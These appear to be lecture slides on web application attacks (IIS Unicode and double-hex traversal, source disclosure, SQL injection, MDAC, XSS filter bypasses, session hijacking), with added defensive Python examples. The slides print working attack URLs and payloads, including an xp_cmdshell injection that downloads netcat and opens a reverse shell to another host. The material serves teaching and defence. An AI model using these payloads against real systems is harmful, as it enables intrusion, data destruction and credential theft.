Network Security
Part II: Attacks
Web Attacks
Overview
• Web Architecture
• Web Hack Attacks
SECURITY INNOVATION ©2003
Web Architecture
• Web applications are important and this
importance is accelerating
• Web applications are complex and this
complexity is accelerating
This is Not New
• Problems with web applications are the same problems as with standalone applications
Why Target the Web
• Everyone is using it
• Safe bet the protocol will not become
obsolete anytime soon
• New technology is being implemented/
retrofitted on top (e.g. SOAP, WebDAV)
• It’s everywhere! Mobile phones, cars,
watches, toasters…
• Protocol fundamentally not suited to do a
majority of what it’s doing today
The Trouble with HTTP
• Multitude of involved technologies
• The involved protocols are extremely simple;
therefore, it is easy to (mis)code services on
your own HTTP server
• Lack of experience coding public service type,
multi-user applications
• Stateless nature makes transaction based
systems tricky
How Did We Get Here?
• Unskilled/robotic programmers (“code
mills”)
• Lack of security-oriented programming
training
• Tendency to ‘code now, fix later’
• Current tools make it very easy to code
insecurely
• Misconceptions about what ‘security’ really
involves
Trouble Prone Areas of the Web
• Buffer overflows
– Classic bug that’s been exploited for quite a while
– Lack of bounds-checking in the language a
majority of web applications are written in
combined with poor programming practice
– Can exist in the web server, application server,
database server, or the CGI programs
– Fortunately it’s a well-advertised problem
– Many scripting languages (ASP, PHP, Perl, .NET, etc.) are generally immune, as they have auto-expanding elements
Trouble Prone Areas of the Web
• Cross-site scripting
– Reprinting user data without filtering it for web-specific characters
– Potential to trick users into executing JavaScript in the vulnerable site’s context
– Partly a ‘social engineering’ technique
– More of a liability than a vulnerability—it’s a way to hack the users, not the server
Trouble Prone Areas of the Web
• SQL tampering
– Web server already has/allows access to the
database server
– Attacker can cause arbitrary SQL to be executed
– Results vary from data exposure to full system
compromise
– Does not require direct database access!
– Many applications are vulnerable
– Stems from CGIs/scripts making assumptions
about user input and not double checking/filtering
Trouble Prone Areas of the Web
• File includes
– It’s common for a CGI to open and display or
manipulate the contents of a file on the server
– If the filename is composed of user-supplied
elements, an attacker may be able to trick the
server into opening another file
– Can lead to info disclosure or script or command
execution
Trouble Prone Areas of the Web
• Authentication weaknesses
– CGIs can fail to check credentials with every
request
– Thus you bypass the login script and directly
access the following scripts, without needing
username/password
– Or, certain actions/functions may not check for the
proper authentication
Trouble Prone Areas of the Web
• Weak session mechanism
– The session/state mechanism uses predictable
token IDs
– Or, the ID keyspace is too small for the number of
users
– Either way, an attacker can ‘guess’ a valid token
and hijack the session
Mid Range E-Commerce Roll-Out
• Web Server
• Application Server
• Database Server
• … and a Firewall
• Maybe some options…
– Load Balancer
– Reverse Proxy servers
– Cache systems
Typical Web Application Set-Up
[Diagram: the Web Client sends an HTTP request (cleartext or SSL) through the Firewall to the Web Server (Apache, IIS, Netscape, etc.). The Web Server runs the Web apps through plugins (Perl, C/C++, JSP, etc.), which reach the SQL Database over a database connection (ADO, ODBC, etc.). The HTTP reply carries HTML, JavaScript, VBScript, etc.]
Traditional Hacking
• Targeted against vulnerabilities in OS
components and Network services.
– Buffer overflows
• Not portable; attacks specific to operating
system architecture, authentication, services, etc.
• Myriad of exploits for different services, OS
platforms, CPU architectures, etc.
Traditional Hacking
• Requires specialized coding skills such as writing shell-code for buffer-overflows, etc.
• In short, it is a complex activity with a limited practitioner base.
(Slide shows an assembly fragment of Winsock socket set-up, reconstructed here from the two spilled columns.)
    ...
    winsock_found:
        xor   eax, eax
        push  eax
        inc   eax
        push  eax
        inc   eax
        push  eax
        call  socket
        cmp   eax, -1
        jnz   socket_ok
        push  sockerrl
        push  offset sockerr
        call  write_console
        jmp   quit2
    socket_ok:
        mov   sock, eax
        mov   sin.sin_family, 2
        mov   esi, offset _port
    ...
Limitations of Traditional Hacking…
• Modern network architectures are getting
more robust and secure.
• Firewalls being used in almost all network
roll-outs.
• OS vendors learning from past mistakes (?)
and coming out with patches rapidly.
• Increased maturity in coding practices.
Utility of Firewalls
[Diagram: the same set-up, with the Firewall blocking (X) attacks on OS network services such as wu-ftpd, Sun RPC and NT ipc$. Hacks on OS network services are prevented by firewalls, which limits traditional hacking.]
Utility of Firewalls
[Diagram: the same set-up; the Firewall blocks (X) direct access to the back-end. Internal back-end application servers are on a non-routable IP network (private addresses).]
Utility of Firewalls
[Diagram: the same set-up; the Firewall blocks (X) connections initiated from the Web Server. Outbound access is restricted: why would a web server telnet out?]
Futility of Firewalls
• Web traffic is the most commonly allowed of any of the protocols through enterprise firewalls.
• HTTP is perceived as friendly traffic.
• Why lay siege to the wall when you have an open door?
• Attacks based on content/applications are still viewed by some as rare.
Tools Required for Web Hacking
• A web browser
• An Internet connection
• ….a clear mind and some spare time!
A Classification of Web Hacks
• Web attacks fall under the following general categories:
– Buffer overflow attacks
– SQL injection attacks
– Input validation attacks
– URL interpretation attacks
– Impersonation attacks
Firewalls Cannot Prevent…
• Complexity mismanagement
• Indifference
[Diagram: Web Client, Firewall, Web Server; the firewall does nothing about web server misconfiguration behind it.]
Attack the Architecture
[Diagram: the Web Server dispatches each request to a handler by file type. html handler: returns the file with a text/html header. shtml handler: processes SSI tags (#include pulls in a file; #exec runs sh, perl, … via /bin/sh) and returns text/html. cgi handler: runs the script/executable as a process and returns its output with a text/html header. jsp handler: processes JSP tags, the Java Compiler produces a class, and the Java Runtime executes it. default handler: ??]
Web Server Architecture
Attacks
• Complex web server architectures can lead to implementation vulnerabilities.
• A common attack is to bypass the web server configuration directives and invoke the built-in procedures directly.
• A close look at the web server architecture can reveal security problems.
Architecture Misconfigurations
• Handler Forcing:
– Certain mis-configurations allow handlers to be forced onto files that are not supposed to be processed by them.
– Forcing a default handler onto a CGI file can cause the contents of the CGI file to be returned “as-is”.
– Forcing a JSP handler onto an HTML file can cause the contents of the HTML file to be compiled by the Java compiler and executed by the Java run-time machine.
JSP Handler Forcing
[Diagram: normally the html handler returns an html file with a text/html header. With the JSP PageCompile handler forced onto html files, the Web Server sends the html file to the jsp handler instead: its JSP tags are processed, the Java Compiler produces a class, and the Java Runtime executes it.]
Firewalls Cannot Prevent…
[Diagram: Web Client, Firewall, Web Server and Web apps; firewalls cannot prevent input validation attacks (poor checking of user inputs) or URL interpretation attacks.]
URL Interpretation Attacks
• Several well-known vulnerabilities in Windows NT and Internet Information Services dating from Autumn 2000 have been wrapped into a common definition: "The Unicode Bug."
• URL Parsing vulnerability.
• Improper handling of illegal Unicode sequences.
• Allows remote users to execute arbitrary commands
on the web server under the context of IUSR.
• Can lead to potential Administrator level access.
The IIS Unicode Bug
• Exploit:
http://10.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
– attacker could view a directory listing of a server's C:\ drive
• %c0%af = “/”
• Can use HTTP POST to send multiple commands at a time to cmd.exe.
Web Hacking for Collateral
Damage
• Web hacking can result in three types of collateral damage:
1. Information disclosure (paths etc.)
• Arbitrary file content and source code leakage
2. Data disclosure (i.e. return all rows)
3. Arbitrary command execution
Source Code Disclosure
"Use the Source, Luke!"
• WebLogic / WebSphere “JSP” bug [1].
• Ability to retrieve source code of JSP/JHTML files.
• Using uppercase “JSP” in the URL causes the server to return unparsed JSP code.
[1] Discovered by Shreeraj Shah, Foundstone.
A Classic Case of “Handler
Mismatch."
[Diagram: an HTTP request for index.JSP reaches the WebLogic Server, whose handlers are registered by extension:
weblogic.httpd.register.file=weblogic.servlet.FileServlet
weblogic.httpd.register.*.shtml=weblogic.servlet.ServerSideIncludeServlet
weblogic.httpd.register.*.jhtml=weblogic.servlet.jhtmlc.PageCompileServlet
weblogic.httpd.register.*.jsp=weblogic.servlet.JSPServlet
The uppercase extension does not match the *.jsp registration, so the jsp handler (process JSP tags, Java Compiler, Java Runtime) is bypassed (X) and the request falls through to the default file handler; on the file system index.JSP = index.jsp, so the raw source of index.jsp is returned.]
More Source Disclosure
• URL prefixes for source code disclosure [1]:
/servlet/file/ (IBM WebSphere)
/file/ (BEA WebLogic)
/*.shtml/ (BEA WebLogic)
/ConsoleHelp/ (BEA WebLogic)
/servlet/com.sun.server.http.servlet.FileServlet/ (Sun JavaWebServer)
[1] Advisories located on: http://www.foundstone.com/advisories.htm
…I Thought it was Functionality
• IIS “+.htr” bug.
– View source code of ASP/ASA files.
– URL interpretation vulnerability.
http://10.0.0.1/global.asa+.htr
– “.htr” causes ISM.DLL to handle the URL.
– Characters after the “+” sign (space) are ignored.
Doom on You….
(global.asa source as returned through the “+.htr” bug; the connection string carries the database credentials.)
<SCRIPT LANGUAGE="VBScript" RUNAT="Server">
Sub Application_OnStart
  Set Db = Server.CreateObject("Commerce.DbServer")
  Db.ConnectionString = "DSN=trans.db;UID=sa;PWD=n0t4u2c"
  Db.Application = "http://10.1.1.16/"
  Set Application("Db") = Db
End Sub
Sub Session_OnStart
  '==Visual InterDev Generated - DataConnection startspan==
  '--Project Data Connection
  Session("DataConn_ConnectionString") = "DSN=CertSrv;DBQ=C:\WINNT2\System32\CertLog\certsrv.mdb;DriverId=25;FIL=MS Access;MaxBufferSize=512;PageTimeout=5;"
  Session("DataConn_ConnectionTimeout") = 15
  Session("DataConn_CommandTimeout") = 30
  Session("DataConn_RuntimeUserName") = ""
  Session("DataConn_RuntimePassword") = ""
  '==Visual InterDev Generated - DataConnection endspan==
End Sub
</SCRIPT>
User ID: sa
Password: n0t4u2c
More Source Disclosure
• Some applications access files without
appropriate checking.
• Input validation vulnerability.
• No checking performed for file type or
location.
• Filenames can be manipulated via parameters
passed on the URL or as hidden fields.
NT IIS Showcode ASP
Vulnerability
• Active Server Page (ASP) script installed by
default on Microsoft's Internet Information
Server (IIS) 4.0
• Gives remote users access to view any file on
the same volume as the web server that is
readable by the web server.
http://www.someserver.com/msadc/Samples/SELECTOR/Showcode.asp?source=/msadc/Samples/../../../../../boot.ini
Firewalls Cannot Prevent…
[Diagram: the typical set-up (Web Client, Firewall, Web Server, Web apps, SQL Database); firewalls cannot prevent input validation attacks, URL interpretation attacks or SQL query poisoning, which extends the application's SQL statements.]
SQL Query Poisoning
• Poor input validation on parameters passed to
SQL queries can be disastrous.
• Return all rows:
http://10.0.0.3/showtable.asp?ID=3+OR+1=1
• Resultant query:
SELECT * FROM PRODUCT WHERE ID=3 OR 1=1
SQL Query Poisoning
• Drop Table:
http://10.0.0.3/showtable.asp?ID=3%01DROP+TABLE+PRODUCT
• Resultant query:
SELECT * FROM PRODUCT WHERE ID=3
DROP TABLE PRODUCT
SQL Query Poisoning
• Remote Command Execution!
http://10.0.0.3/showtable.asp?ID=3%01EXEC+master..xp_cmdshell+‘tftp+-i+10.0.0.13+GET+nc.exe+%26%26+nc+-e+cmd.exe+10.0.0.11+2000’
• Command executed:
tftp -i 10.0.0.13 GET nc.exe && nc -e cmd.exe 10.0.0.11 2000
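Added example (not from the deck): the showtable.asp query assembled by string concatenation beside a parameterised version, run against a constructed in-memory SQLite table, plus a log check that flags numeric parameters carrying anything but digits, as the ID=3+OR+1=1 and ID=3%01DROP+TABLE requests on these slides do. The PRODUCT schema, the log lines and the NUMERIC_PARAMS list are assumptions.

```python
import re
import sqlite3
from urllib.parse import parse_qsl, urlsplit


def make_db():
    """Constructed in-memory stand-in for the deck's PRODUCT table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE PRODUCT (ID INTEGER PRIMARY KEY, NAME TEXT)")
    db.executemany("INSERT INTO PRODUCT VALUES (?, ?)",
                   [(1, "widget"), (2, "gadget"), (3, "gizmo")])
    return db


def show_table_vulnerable(db, raw_id):
    """The mistake the slides describe: the ?ID= value is pasted into the SQL
    text, so ID=3 OR 1=1 turns a one-row lookup into 'return all rows'."""
    query = "SELECT * FROM PRODUCT WHERE ID=" + raw_id
    return db.execute(query).fetchall()


def show_table_hardened(db, raw_id):
    """Validate the parameter against the type the page expects, then bind it;
    the driver never splices user text into the statement."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("ID must be a positive integer")
    return db.execute("SELECT * FROM PRODUCT WHERE ID=?", (int(raw_id),)).fetchall()


# --- detection side -------------------------------------------------------
# Parameters the application defines as numeric (assumption for this example).
NUMERIC_PARAMS = {"ID"}

# Constructed access-log lines in common log format carrying the deck's URLs.
LOG_LINES = [
    '10.0.0.13 - - [25/Jul/2003:12:21:03 -0700] "GET /showtable.asp?ID=3 HTTP/1.0" 200 512',
    '10.0.0.13 - - [25/Jul/2003:12:21:09 -0700] "GET /showtable.asp?ID=3+OR+1=1 HTTP/1.0" 200 4096',
    '10.0.0.13 - - [25/Jul/2003:12:21:15 -0700] "GET /showtable.asp?ID=3%01DROP+TABLE+PRODUCT HTTP/1.0" 500 0',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def suspicious_requests(log_lines):
    """Return (parameter, decoded value) for every numeric parameter whose
    decoded value is not purely digits. parse_qsl undoes %xx and '+' encoding,
    so the %01 and '+' tricks in the deck's URLs do not hide the injected SQL."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name in NUMERIC_PARAMS and not value.isdigit():
                hits.append((name, value))
    return hits
```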
SQL Remote Commando
[Diagram: SQL Remote Commando. (1) The web browser sends the poisoned URL to the ASP page on IIS. (2) IIS passes the resulting query, SELECT * FROM PRODUCT WHERE ID=3 EXEC master..xp_cmdshell 'tftp -i 10.0.0.13 GET nc.exe && nc -e cmd.exe 10.0.0.11 2000', to the DB; the tftp server is used to get nc.exe transferred over to the NT IIS box. (3) nc.exe connects back to the nc.exe listener (port 2001 in the diagram), giving a C:\> prompt.]
Firewalls Cannot Prevent…
[Diagram: the typical set-up; firewalls cannot prevent impersonation: reverse engineering HTTP cookies, HTTP session hijacking, URL interpretation attacks, input validation attacks and SQL query poisoning all pass through.]
Firewalls Cannot Prevent…
[Diagram: the typical set-up once more (Web Client, Firewall, Web Server such as Apache, IIS or Netscape with Perl, C/C++ or JSP plugins, database connection via ADO or ODBC, SQL Database); firewalls cannot prevent application bugs.]
The MDAC Attack
• Vulnerability with Microsoft Data Access
Components (msadcs.dll).
• MDAC allows remote users to perform SQL
queries without authentication.
• Only the DSN needs to be known.
• SQL queries can be crafted to execute
arbitrary commands.
The MDAC Attack
[Diagram: the MDAC request path. A client (Internet Explorer or VB.exe) talks over HTTP (URL) to msadcs.dll on IIS, the Remote Data Service. The RDS Data Control and RDS Data Space on the client side reach the RDS Data Factory and Custom Business Objects on the server, which use ADO and the ODBC provider (here the Jet 3.5 provider) to query the DB; an ASP server producing HTML sits alongside.]
The MDAC Attack
• Exploit:
$query="Select * from Customers
where City='|shell(\"$command\")|'";
$dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .
$p1 . ":\\" . $p2 .
"\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";}
• Gain Administrator Privileges on NT!
The MDAC Attack in Action
[Diagram: The MDAC attack in action. (1) mdac.pl (exploit) sends the request to msadcs.dll on IIS 4.0. (2) The query SELECT * FROM Customers WHERE City = "|shell($command) is executed against the DB; the tftp server is used to get nc.exe transferred over to the NT IIS box. (3) nc.exe connects back to the nc.exe listener at port 2001, giving a C:\> prompt.]
The Effectiveness of Web Hacking
• By default ports 80 and 443 are usually
allowed through firewalls. The open door…
• A single URL string is able to be processed by
many different components.
• In most cases the only defense is reliance on
secure coding.
Missile of Death
[Diagram: the URL http://10.0.0.1/catalog/display.asp?pg=1&product=7, split into its pieces (scheme, host, path catalog, script display.asp, query parameters pg=1 and product=7), each processed by a different component: Web Server, Web apps, DBs.]
Cross Site Scripting, Why You Should Care.
• XSS is not an attack on the server, it is an attack on the users of your application
• So what?
– Identity theft
– User masquerading
– Reputation Risk
Cross Site Scripting (XSS)
• Found in 98% of applications
• 2 main types
– Transient (URL based)
http://badapp.com/error.jsp?msg=<SCRIPT>alert("Test");</SCRIPT>
– Sticky – Script placed in a static bit of web content
XSS continued…
• Transient generally requires user interaction
• What can happen?
– Possibilities are only restricted by the client
– Cookie theft most common example
• But I filter “<” and “>”
– JScript entities: “&{alert('Test')};”
Session Hijacking
• HTTP is stateless so application designers must build a way to track state
• Cookies and URL strings are the most common ways to track state
• Both are easily exploitable
Session Hijacking Continued…
• Generally the next thing to occur after XSS
• Examples of common session tracking issues
Parameter Tampering
• Programmers will store data anywhere!
– URL parameters: http://badapp.com/checkout.pl?p=$1.00
– Cookies: Cookie: p=$1.00
– Hidden fields – not really hidden
Unbound File Calls
• Ye Ole’ ../../
• Becomes an issue when the application displays important information (global.asa)
• Most application languages will take URLs as file arguments
Do You Know Where Your Data is?
• Building an exclusionary filter is difficult because your data is all over the place
Data Flow Example
[Diagram: requests from the Internet reach www.hackme.com, and the data flows on to the Orders Database, the Marketing Database and the Customer Service Database.]
Designing a proper filter
• Make all filters default deny
– Don’t try to exclude “bad stuff”
• Requires a good idea where your data is going
• Log all filter violations
Filter Bypassing is a Technique to Evade Detection by Filtering Systems.
• Filter Bypassing techniques come in many varieties when
applied to the many facets of web application security.
• The general idea of performing the various techniques
described is to successfully bypass security measures
designed to prevent certain types/amounts/values of data
from being passed into a given system.
• Many of the described techniques can be highly effective
when used properly and even become more powerful
when used in combination.
Most filter systems are very simple
Seven forms of ingenuity:
• URL Encoded Strings
• Double Hex Encoding
• Unicode Encoded String
• Long URLs
• Case Sensitivity
• XSS Filter-Bypass Manipulation
• Null Character Injection
The Hex Advantage
By URL hex encoding URL strings, it may be possible to circumvent filter security systems and IDS.
http://foo.com/cgi?file=/etc/passwd
Can become:
http://foo.com/cgi?file=/%2F%65%74%63%2F%70%61%73%73%77%64
Double Hex Encoding
• In September 2001, the Nimda worm spread throughout the Internet taking advantage of a Microsoft IIS vulnerability.
• The vulnerability was called an Escaped Character Decoding Vulnerability, which involves double hex encoding of a URL.
• An attacker or automated script would craft a URL so that it contained special hex-encoded sequences to exploit a vulnerability.
• When an un-patched, vulnerable Microsoft IIS server received the encoded URL, one round of hex decoding was performed on the path in the URL.
• IIS then performed a security check on the decoded URL, but afterwards performed a second round of hex decoding.
• This secondary decoding was the source of another vulnerability.
IIS Double Hex
Round 1 Decoding:
scripts/..%255c../winnt
becomes:
scripts/..%5c../winnt
(%25 = “%” Character)
Round 2 Decoding:
scripts/..%5c../winnt
becomes:
scripts/..\../winnt
Directory path traversal is now possible using path
obfuscation through Double Hex Encoding.
The Unicode Slash
• In Unicode, “%c0%af” is the equivalent of a slash (“/”).
• Therefore the common IIS URL exploit:
scripts/..%c0%af../winnt
• becomes: scripts/../../winnt
Once again, directory path traversal is possible using path obfuscation through Unicode.
Double Slash
• Double Slash: using multiple directory slashes in URLs. For example:
http://www.foo.com/..//etc//passwd
• Can be used to move under the radar of IDS systems and still function properly.
Long URLs
• Many systems put limits on how much data a variable can store or a system can handle.
• Often, if these limits are exceeded, the data will still be used but bypass certain security considerations.
• URLs such as:
http://www.foo.com/cgi?param=filename
• Replaced with:
http://www.foo.com/cgi?param=<2K_of_Data>
Case Sensitivity
• Case sensitivity may play a role in many security filtration systems.
• Alternating case on URL parameters may be used to bypass certain restrictions.
http://foo.com/cgi?param=bar
http://foo.com/cgi?param=BaR
http://foo.com/CGI?param=BAR
Method Switching
• Many web applications do not properly perform HTTP Request Method sanity checking.
• Performing Method Switching can be used to bypass IDS, logging features and CGI security mechanisms.
• Most web servers do not log "POST" data and thus forensic analysis is harder to perform.
The request method:
GET /cgi-bin/some.cgi
can become:
POST /cgi-bin/some.cgi
HTTP 1.1 Methods
The Method token indicates the method to be performed on the resource identified by the Request-URI.
• OPTIONS
• GET
• HEAD
• POST
• PUT
• DELETE
• TRACE
• CONNECT
Using your “HEAD”
• The “HEAD” request method can be used to determine if a particular HTTP resource is accessible without actually downloading the resource data.
• Scans and web application attacks can be made more effective using this technique.
Null Character Injection
• Hex encoded null characters can be used to thwart some security mechanisms.
• This happens because in the “C” programming language, a null character designates the end of a string.
• So if a CGI appends “.html” to an input parameter:
http://foo.com/cgi?file=../../etc/passwd%00
• the null will cut off the appended “.html”.
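Added example (not from the deck) covering the hex encoding, double hex encoding, Unicode slash, double slash and null character slides above: a path canonicaliser that decodes completely and validates before checking, shown beside a model of the decode, check, decode-again order the deck describes for IIS. The web-root model, the error strings and the classify() logging shape are assumptions of this example.

```python
import re
from urllib.parse import unquote_to_bytes


class RejectedPath(ValueError):
    """Raised when a request path cannot be canonicalised safely."""


def resolve(text):
    """Normalise separators, collapse '//' and resolve '.' and '..' against a
    virtual web root; climbing above the root is the traversal we must refuse."""
    text = re.sub(r"/+", "/", text.replace("\\", "/"))
    parts = []
    for seg in text.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not parts:
                raise RejectedPath("traversal above web root")
            parts.pop()
        else:
            parts.append(seg)
    return "/" + "/".join(parts)


def flawed_order(raw_path):
    """Models the order the deck describes for IIS: decode once, run the check,
    then decode a second time. Returns the string the file system would see;
    no exception means the check passed."""
    once = unquote_to_bytes(raw_path.encode("ascii")).decode("latin-1")
    resolve(once)                        # the check runs on half-decoded text
    return unquote_to_bytes(once.encode("latin-1")).decode("latin-1")


def canonicalize(raw_path):
    """Hardened order: decode completely and validate the result, then check."""
    try:
        data = raw_path.encode("ascii")  # a request line is ASCII; raw bytes are not a URL
    except UnicodeEncodeError:
        raise RejectedPath("non-ASCII byte in request path")
    decoded = unquote_to_bytes(data)
    # If a second round would still change the text, the client sent %25xx
    # (double hex encoding). Refuse it instead of decoding again after the check.
    if unquote_to_bytes(decoded) != decoded:
        raise RejectedPath("double percent-encoding")
    try:
        text = decoded.decode("utf-8")   # strict: the overlong %c0%af is not valid UTF-8
    except UnicodeDecodeError:
        raise RejectedPath("invalid UTF-8 sequence")
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in text):
        raise RejectedPath("control character (e.g. %00) in path")
    return resolve(text)


def classify(raw_path):
    """(status, detail) pair for a filter log: every rejection is recorded with
    its reason, as the 'log all filter violations' rule asks."""
    try:
        return ("ok", canonicalize(raw_path))
    except RejectedPath as err:
        return ("reject", str(err))
```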
Unicode (UTF-8) Encoded
• Unicode is a universal way to represent characters.
• However, Unicode can also be used to circumvent security mechanisms by representing information in another fashion.
• Microsoft IIS has had security issues in the past while supporting Unicode.
URL Encoded String
• The specification for URLs (RFC 1738, Dec. '94) poses a problem in that it limits the use of allowed characters in URLs to only a limited subset of the US-ASCII character set:
• "...Only alphanumerics [0-9a-zA-Z], the special characters "$_.+!*'()," [not including the quotes - ed], and reserved characters used for their reserved purposes may be used unencoded within a URL."
XSS Filter-Bypass Manipulation
• This technique is used to pass various types of client-side scripting language through implemented security filters.
• The idea is to be able to achieve client-side execution of a client-side script.
• There are several techniques used to perform this attack.
Hammer the Filters
• Submit all the raw HTML tags you can find, and then view the output results.
• Combine HTML with tag attributes, such as SRC, STYLE, HREF and OnXXX (JavaScript Event Handler).
• This will show what HTML is allowed, what the changes were, and possible dangerous HTML that can be exploited.
SRCing the Protocol
• Using the “javascript” protocol in an HTML source attribute.
<IMG SRC="javascript:js_expression">
<IMG SRC="javascript:alert('test');">
Alternate Protocol SRCing
• Same technique as the previous; however, using the protocols “livescript” and “mocha” will yield the same effect.
<IMG SRC="livescript:js_expression">
<IMG SRC="mocha:alert('test');">
Decimal HTML Entities
• Variation on previous techniques: using decimal HTML entities between the protocol characters can be used to bypass filters, yet still execute JavaScript.
<IMG SRC="java&#010;script:js_expression">
• \09 \10 \11 \12 \13 have all been seen to work
Hex HTML Entities
• Another variation on the previous example: hex HTML entities may also be used to bypass filter restrictions, yet execute JavaScript.
<IMG SRC="java&#X0A;script:js_expression">
Padding HTML Entities
• Padding HTML entities with “0”s may also be used to bypass the filters, yet still execute JavaScript.
<IMG SRC="java&#000009;script:js_expression">
STYLE JavaScript Type
• Changing the MIME type on a “style” tag may be used to execute JavaScript.
<style TYPE="text/javascript">
JS EXPRESSION
</style>
<style TYPE="text/javascript">
alert(document.domain);
</style>
STYLE JavaScript X-Type
• Variation on the previous example, but by using the “application/x-javascript” MIME type, the filters may be bypassed.
<STYLE TYPE="application/x-javascript">
alert('JavaScript has been Executed');
</STYLE>
STYLE JavaScript Import
• Using the @import feature in CSS may be used to perform JavaScript protocol SRCing.
<style TYPE="text/css">
@import url(javascript:alert('Javascript is executed'));
</style>
STYLE URL Import
• Using the @import feature in CSS can also be used to import JavaScript from another HTTP resource.
<STYLE type=text/css>
@import url(http://www.test.com);
</STYLE>
LINK Style Sheet
• The “LINK” tag can be used to import JavaScript from a remote HTTP resource.
<LINK REL=STYLESHEET TYPE="text/javascript" SRC="javascript_path.js">
Style Left Expression
• A few CSS features used together to execute JavaScript.
<P STYLE="left:expression(eval('alert(\'JavaScript is executed\');window.close()'))">
Remote SRCing
• A few HTML tags, such as “LAYER”, “ILAYER”, “FRAME”, and “IFRAME” can be used to src in JavaScript from remote resources.
<LAYER SRC="js.html"></LAYER>
…AND CURLY
<IMG SRC="&{javascript_expression};">
<IMG SRC="&{alert('alert')};">
• Syntax must be exact.
Dangerous HTML Tags
• “All HTML is to be considered dangerous, but these tags are the most insidious.”
– <APPLET>
– <BODY>
– <EMBED>
– <FRAME>
– <FRAMESET>
– <HTML>
– <IFRAME>
– <IMG>
– <LAYER>
– <ILAYER>
– <META>
– <OBJECT>
– <SCRIPT>
– <STYLE>
Dangerous HTML Attributes
• (HTML tags with these attributes.)
– SRC
– LOWSRC
– STYLE
– HREF
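Added example (not from the deck) tying the "Designing a proper filter" slide to the SRC/entity bypasses just shown: an output filter built default-deny, with an attribute check that looks at the value the way a browser does (entities decoded, tabs and newlines dropped) before allowing only http/https, and a tag sanitiser that keeps an allow list and strips every attribute. The allowed tag set, the scheme list and the VIOLATIONS log are assumptions of this example.

```python
import html
import re
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_TAGS = {"b", "i", "p", "br"}        # assumed rich-text subset for this example
VIOLATIONS = []                             # "log all filter violations"

TAG_RE = re.compile(r"<(/?)([A-Za-z][A-Za-z0-9]*)\b[^>]*>")


def log_violation(context, value, reason):
    VIOLATIONS.append((context, value, reason))
    return None


def render_text(user_data):
    """Default deny for text nodes: every markup-significant character is
    encoded, so <SCRIPT>alert("Test");</SCRIPT> is displayed, never executed."""
    return html.escape(user_data, quote=True)


def safe_url_attribute(value, context="SRC"):
    """Allow-list check for a user-controlled SRC/HREF. Returns the attribute-safe
    string, or None (after logging) if a browser could treat it as script."""
    seen = html.unescape(value)             # what the browser sees: &#010; -> "\n"
    # Browsers skip tabs and newlines inside a scheme, so "java\nscript:" still
    # runs; decide on the scheme with those characters removed.
    probe = re.sub(r"[\x00-\x20\x7f]", "", seen).lower()
    if probe.startswith("&{"):              # JavaScript entity form &{...};
        return log_violation(context, value, "script entity")
    parts = urlsplit(probe)
    if parts.scheme == "":
        if parts.netloc:                    # //other.host/... leaves our origin
            return log_violation(context, value, "protocol-relative URL")
        return html.escape(seen, quote=True)
    if parts.scheme not in ALLOWED_SCHEMES:
        return log_violation(context, value, "scheme %r not allowed" % parts.scheme)
    return html.escape(seen, quote=True)


def sanitize_fragment(fragment):
    """Rich-text sanitiser built the 'default deny' way: only tags on the allow
    list survive, always stripped of every attribute (SRC, STYLE, HREF, onXXX);
    any other tag and every bare '<' are HTML-encoded and shown as text."""
    out, pos = [], 0
    for m in TAG_RE.finditer(fragment):
        out.append(html.escape(fragment[pos:m.start()], quote=True))
        slash, name = m.group(1), m.group(2).lower()
        if name in ALLOWED_TAGS:
            out.append("<%s%s>" % (slash, name))
        else:
            log_violation("tag", m.group(0), "tag not on allow list")
            out.append(html.escape(m.group(0), quote=True))
        pos = m.end()
    out.append(html.escape(fragment[pos:], quote=True))
    return "".join(out)
```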
Web Applications Logins
Traditional Brute Force
• guest
• Admin
• 123123
• Password
• Etc.
Session ID Overview
• HTTP is a stateless protocol
• Rather than make a user authenticate upon each click in a web application, a sense of “state” is created
• In order to maintain state, a shared string, token, or secret between HTTP client and server is usually used by developers
• Essentially, authentication data (username/password) is exchanged for a “Session ID”
Web State Attacks
• Session Replay
– A traditional replay attack in the cryptography sense is an attack in which a valid data transmission is maliciously or fraudulently repeated, either by the originator or by an adversary who intercepts the data and retransmits it.
• Session Hijacking
– Seizing control of a legitimate user's web application session while that user is “logged in” to the application
Session ID
• Session ID should IN THEORY be just as
secure as username/password
Session ID Overview
• While it is generally clear that
username/password pairs are indeed
authentication data and therefore sensitive, it
is not generally understood that session IDs
are also just as sensitive because of their
frequent use for authentication. See RFC 2964
(Use of HTTP State Management).
Session ID Overview
• Session IDs are commonly stored in cookies
and/or URLs, and hidden fields of web pages
(or some combination)
• Session ID generated by WEB SERVER (IIS,
etc.) when the user first hits the site or by
WEB APPLICATION (ATG dynamo, Apache
Tomcat, BEA Websphere, .jsp, .asp, perl, etc.)
when the user logs in
Cookie Refresher
• Sometimes the cookies are set to expire (i.e., be deleted) upon closing the browser; these are typically called “session cookies” or “non-persistent” cookies
• Persistent cookies last beyond a user’s session (i.e. “Remember Me” option)
• Persistent cookies are usually stored on the user’s hard drive in a location according to the particular operating system and browser (e.g., C:\Program files\netscape\users\username\cookies.txt for Netscape and C:\Documents and Settings\username\Cookies for IE on Win2K).
Cookie Refresher
• Cookie Refresher (RFC 2965)
Example cookies.txt entry, fields numbered 1 to 7:
(1) www.redhat.com (2) FALSE (3) / (4) FALSE (5) 1154029490 (6) Apache (7) 64.3.40.151.16018996349247480
1.) domain: The website domain that created and that can read the variable.
2.) flag: A TRUE/FALSE value indicating whether all machines within a given domain can access the variable.
3.) path: Pathname of the URL(s) capable of accessing the cookie from the domain.
4.) secure: A TRUE/FALSE value indicating if an SSL connection with the domain is needed to access the variable.
5.) expiration: The Unix time that the variable will expire on. Unix time is defined as the number of seconds since 00:00:00 GMT on Jan 1, 1970. Omitting the expiration date signals to the browser to store the cookie only in memory; it will be erased when the browser is closed. (expires July 27, 2006)
